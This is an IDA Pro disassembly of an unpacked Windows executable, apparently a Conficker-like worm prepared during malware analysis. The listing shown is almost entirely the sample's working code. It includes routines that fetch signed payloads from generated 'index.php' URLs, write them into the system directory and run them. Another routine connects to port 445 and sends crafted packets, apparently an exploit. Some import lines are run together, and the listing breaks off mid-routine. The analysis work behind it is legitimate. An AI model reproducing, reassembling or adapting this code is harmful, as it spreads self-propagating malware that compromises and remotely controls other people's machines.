;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 8BDC6A6B2360419F07F36445558140B9
; File Name : u:\work\8bdc6a6b2360419f07f36445558140b9_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 30900000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 30901000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_30901000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_30901004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_30901008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3090100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_30902859+1D�r
dword_30901010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_30901014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_30902859+4E�r ...
dword_30901018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3090101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_30901020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_30901024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_30901028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3090102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_30901030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_30901034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_30901038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_30901040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_30901044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_30901048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3090104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_30901050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_30901054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_30901058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3090105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_30901060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_30901064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_30901068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_30902B37+8F�r
dword_3090106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_30901070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_30901074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_30902A6B+F�r
dword_30901078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3090107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_309011A0+F6�r ...
dword_30901080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_30902195+57�r
dword_30901084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_30901422+64�r ...
dword_30901088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_30902A6B+40�r
dword_3090108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_30902A6B+1B�r
dword_30901090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_30901094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_309017D2+16C�r ...
dword_30901098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3090109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_309010A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_309010A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_30901DC1+2C�r
dword_309010A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_30902383+11C�r
dword_309010AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_309010B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_30902905+92�r
dword_309010B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:30902307�r
dword_309010B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_309010BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_309010C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_30901F23+12�r
dword_309010C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_309010C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_309010CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_309010D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_30902195+66�r ...
dword_309010D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3090259A+3F�r ...
dword_309010D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_309010DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_309010E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_30902A6B+C3�r
dword_309010E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_309010EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_309010F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_309010F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_309010F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_309010FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_30901F44:loc_30901F55�r ...
; ---------------------------------------------------------------------------
loc_30901100: ; DATA XREF: UPX0:loc_30902CA0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_30901104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3090204F:loc_30902080�r ...
dword_30901108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_30901422+AA�r
align 10h
dword_30901110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_30901114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_30901118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3090111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_309015C7+77�r ...
dd 0
dword_30901124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_309015C7+9D�r
dword_30901128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_309015C7+89�r
dword_3090112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_30901130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:30902779�r
dword_30901134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_309015C7+B0�r
dd 0
dword_3090113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_30901140 dd 71AB3E00h ; resolved to->WS2_32.binddword_30901144 dd 71AB88D3h ; resolved to->WS2_32.listendword_30901148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3090114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_30901150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_30901154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_30901158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_30902195+AC�r
dword_3090115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_309026E9+D�r
dword_30901160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_30902195+F0�r
dword_30901164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_30901168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3090204F+67�r ...
dword_3090116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_309017D2+1D8�r ...
dword_30901170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3090204F+128�r
dword_30901174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3090204F+12F�r
align 10h
dword_30901180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_30901190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309011A0 proc near ; CODE XREF: sub_30901422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_309011CB
push 1
jmp loc_30901261
; ---------------------------------------------------------------------------
loc_309011CB: ; CODE XREF: sub_309011A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3090108C ; GetSystemDirectoryA
mov edi, dword_30901088
lea eax, [ebp+var_110]
push offset dword_309041F8
push eax
call edi ; dword_30901088
lea eax, [ebp+var_110]
push 6
push eax
call dword_30901084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_30901F44
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_309041F0
push eax
call edi ; dword_30901088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_30901080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_30901241
push 2
jmp short loc_30901261
; ---------------------------------------------------------------------------
loc_30901241: ; CODE XREF: sub_309011A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_30901124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_30901264
push [ebp+var_4]
call dword_3090107C ; CloseHandle
push 3
loc_30901261: ; CODE XREF: sub_309011A0+26�j
; sub_309011A0+9F�j
pop eax
jmp short loc_309012B5
; ---------------------------------------------------------------------------
loc_30901264: ; CODE XREF: sub_309011A0+B4�j
mov edi, 100000h
push edi
call sub_30902C75
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_30901134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_30901078 ; WriteFile
push [ebp+var_4]
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_30901F74
push ebx
call sub_30902C89
add esp, 0Ch
xor eax, eax
loc_309012B5: ; CODE XREF: sub_309011A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_309011A0 endp
; =============== S U B R O U T I N E =======================================
sub_309012BA proc near ; CODE XREF: sub_30901422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_309012D1: ; CODE XREF: sub_309012BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_309012D1
pop edi
pop esi
pop ebx
retn
sub_309012BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901316 proc near ; CODE XREF: sub_3090139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_30901349
add ebx, 1Ah
loc_30901349: ; CODE XREF: sub_30901316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_30901108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_30901108
pop ecx
test eax, eax
pop ecx
jz short loc_30901373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901373: ; CODE XREF: sub_30901316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_30901108
pop ecx
test eax, eax
pop ecx
jz short loc_30901393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_30901396
; ---------------------------------------------------------------------------
loc_30901393: ; CODE XREF: sub_30901316+68�j
mov al, [ebp+arg_0]
loc_30901396: ; CODE XREF: sub_30901316+5B�j
; sub_30901316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090139B proc near ; CODE XREF: sub_30901422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_309013F8
mov edi, [ebp+arg_0]
push ebx
loc_309013B0: ; CODE XREF: sub_3090139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_30901316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_309013DC
cmp bl, 7Ah
jg short loc_309013DC
movsx esi, bl
sub esi, 61h
loc_309013DC: ; CODE XREF: sub_3090139B+34�j
; sub_3090139B+39�j
cmp bl, 41h
jl short loc_309013EC
cmp bl, 5Ah
jg short loc_309013EC
movsx esi, bl
sub esi, 41h
loc_309013EC: ; CODE XREF: sub_3090139B+44�j
; sub_3090139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_309013B0
pop ebx
jmp short loc_309013FB
; ---------------------------------------------------------------------------
loc_309013F8: ; CODE XREF: sub_3090139B+F�j
mov edi, [ebp+arg_0]
loc_309013FB: ; CODE XREF: sub_3090139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3090139B endp
; =============== S U B R O U T I N E =======================================
sub_30901402 proc near ; CODE XREF: sub_30901422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_30901406: ; CODE XREF: sub_30901402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_30901406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_30901402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901422 proc near ; CODE XREF: sub_309015C7+B7�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901180
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_30901104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_309015A8
add edi, 4
mov [ebp+var_130], edi
jz loc_309015A8
push edi
call dword_30901084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_309015A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_309015A8
cmp ebx, 1Ah
jge loc_309015A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_30901108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_309015A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3090139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_309012BA
lea eax, [ebp+var_164]
push eax
call sub_30901402
add esp, 1Ch
cmp [esi], al
jnz short loc_309015A8
push 44h
push offset dword_30904000
lea eax, [ebp+var_124]
push eax
call sub_30901700
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3090176B
add esp, 18h
test eax, eax
jnz short loc_3090159B
cmp [ebp+var_174], edi
jz short loc_3090159B
lea eax, [ebp+var_11C]
push eax
call sub_309011A0
pop ecx
mov [ebp+var_128], edi
loc_3090159B: ; CODE XREF: sub_30901422+15C�j
; sub_30901422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3090174F
pop ecx
loc_309015A8: ; CODE XREF: sub_30901422+4E�j
; sub_30901422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309015C7 proc near ; CODE XREF: sub_3090169C+1B�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_30902C75
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_30901090 ; GetLocaleInfoA
xor ebx, ebx
cmp [ebp+arg_4], bl
jz short loc_3090162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_30904FBC
push dword_30904FD4
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3090111C ; wsprintfA
add esp, 1Ch
jmp short loc_30901647
; ---------------------------------------------------------------------------
loc_3090162F: ; CODE XREF: sub_309015C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
loc_30901647: ; CODE XREF: sub_309015C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_30901128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_30901124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_30901134 ; InternetReadFile
push esi
call sub_30901422
push esi
call sub_30902C89
mov esi, dword_3090112C
pop ecx
pop ecx
push ebx
call esi ; dword_3090112C
push edi
call esi ; dword_3090112C
pop edi
pop esi
pop ebx
leave
retn
sub_309015C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_3090169C proc near ; DATA XREF: sub_30902383+161�o
push esi
push edi
mov edi, dword_30901098
loc_309016A4: ; CODE XREF: sub_3090169C+62�j
xor esi, esi
loc_309016A6: ; CODE XREF: sub_3090169C+4E�j
inc esi
inc esi
mov al, byte_30904080[esi+esi*4]
push eax
push off_30904081[esi+esi*4]
call sub_309015C7
pop ecx
pop ecx
call dword_309010FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_30902039
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_30901094 ; Sleep
cmp esi, 16h
jb short loc_309016A6
push 0
push offset dword_30904FD4
call edi ; dword_30901098
push 0
push offset dword_30904FBC
call edi ; dword_30901098
jmp short loc_309016A4
sub_3090169C endp
; =============== S U B R O U T I N E =======================================
sub_30901700 proc near ; CODE XREF: sub_30901422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_30901034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_30901034
test eax, eax
jnz short loc_3090172D
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_30901034
test eax, eax
jnz short loc_3090172D
push 1
pop eax
jmp short loc_3090174B
; ---------------------------------------------------------------------------
loc_3090172D: ; CODE XREF: sub_30901700+19�j
; sub_30901700+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_30901038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3090174B: ; CODE XREF: sub_30901700+2B�j
pop edi
pop esi
pop ebx
retn
sub_30901700 endp
; =============== S U B R O U T I N E =======================================
sub_3090174F proc near ; CODE XREF: sub_30901422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3090102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_30901030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3090174F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090176B proc near ; CODE XREF: sub_30901422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3090101C ; CryptCreateHash
test eax, eax
jnz short loc_30901791
push 1
pop eax
jmp short loc_309017CE
; ---------------------------------------------------------------------------
loc_30901791: ; CODE XREF: sub_3090176B+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901020 ; CryptHashData
test eax, eax
jnz short loc_309017AA
push 2
pop edi
jmp short loc_309017C3
; ---------------------------------------------------------------------------
loc_309017AA: ; CODE XREF: sub_3090176B+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_30901024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_309017C3: ; CODE XREF: sub_3090176B+3D�j
push [ebp+arg_0]
call dword_30901028 ; CryptDestroyHash
mov eax, edi
loc_309017CE: ; CODE XREF: sub_3090176B+24�j
pop edi
pop esi
pop ebp
retn
sub_3090176B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309017D2 proc near ; CODE XREF: sub_30902536+36�p
; sub_3090259A+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_30902CC0
mov eax, dword_30904C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_30904C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_30901158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_30901D32
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3090115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3090109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_30904C78
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_30901845: ; CODE XREF: sub_309017D2+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_30901845
push 60h
lea eax, [ebp+var_E4]
push offset dword_30904798
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_30902CB2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_30902CAC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_30902CAC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_30902CB2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_30902CA6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_30901160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_30901164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_30901D28
mov esi, dword_30901094
mov edi, 0C8h
push edi
call esi ; dword_30901094
push ebx
mov ebx, dword_30901168
push 89h
push offset dword_30904580
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A8h
push offset dword_3090460C
push [ebp+var_4]
call ebx ; dword_30901168
push edi
call esi ; dword_30901094
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
